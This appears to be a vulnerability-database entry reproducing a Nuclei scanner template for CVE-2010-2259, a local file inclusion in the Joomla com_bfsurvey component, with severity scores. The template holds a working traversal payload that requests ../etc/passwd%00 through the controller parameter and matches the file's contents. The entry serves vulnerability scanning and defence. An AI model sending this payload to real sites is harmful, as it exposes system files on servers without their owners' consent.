Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-2259
HistoryAug 07, 2021 - 5:19 p.m.

Joomla! Component com_bfsurvey - Local File Inclusion

2021-08-0717:19:03
ProjectDiscovery
github.com
8

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.017 Low

EPSS

Percentile

87.8%

A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-2259

info:
  name: Joomla! Component com_bfsurvey - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files and potential remote code execution.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/10946
    - https://nvd.nist.gov/vuln/detail/CVE-2010-2259
    - http://www.exploit-db.com/exploits/10946
    - http://www.tamlyncreative.com.au/software/forum/index.php?topic=641.0
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-2259
    cwe-id: CWE-22
    epss-score: 0.01671
    epss-percentile: 0.86287
    cpe: cpe:2.3:a:tamlyncreative:com_bfsurvey_profree:1.2.6:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: tamlyncreative
    product: com_bfsurvey_profree
  tags: cve,cve2010,joomla,lfi,edb,tamlyncreative

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4a0a00473045022100fe73e1a14455f4c4289bbb04699a0783bbdb34d80aed0e6f22d7f5126162aa1302205f819b7049294b93e97e102214b01063586165e91c8abc034d8ff56771617cd4:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

7.1 High

AI Score

Confidence

High

0.017 Low

EPSS

Percentile

87.8%

Related for NUCLEI:CVE-2010-2259